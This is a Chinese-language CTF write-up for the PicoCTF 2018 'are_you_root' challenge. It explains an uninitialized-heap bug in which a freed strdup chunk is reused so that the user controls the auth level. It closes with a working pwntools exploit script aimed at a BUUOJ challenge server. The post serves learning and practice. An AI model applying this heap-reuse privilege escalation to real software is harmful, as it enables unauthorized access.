欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

PicoCTF_2018_are_you_root(未初始化验证漏洞)

程序员文章站 2022-05-15 21:50:56
...

PicoCTF_2018_are_you_root

首先,检查一下程序的保护机制

PicoCTF_2018_are_you_root(未初始化验证漏洞)

然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。

PicoCTF_2018_are_you_root(未初始化验证漏洞)

Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符串长度一样的堆,并把字符串拷贝进去。

PicoCTF_2018_are_you_root(未初始化验证漏洞)

Reset的时候,释放的是strdup生成的堆。因此,如果strdup生成的堆为0x20,下一次login时第一个malloc就会取出这个堆,而便宜8处的值就是之前用户输入的name的偏移8处的值,因此auth验证码可以任意控制。

PicoCTF_2018_are_you_root(未初始化验证漏洞)

#coding:utf8
from pwn import *

#sh = process('./PicoCTF_2018_are_you_root')
sh = remote('node3.buuoj.cn',27478)

def login(name):
   sh.sendlineafter('>','login ' + name)

def reset():
   sh.sendlineafter('>','reset')

def getFlag():
   sh.sendlineafter('>','get-flag')

#存在一个未初始化漏洞,没有对level进行校验
login('a'*0x8 + p64(0x5))
reset()
login('haivk')
getFlag()

sh.interactive()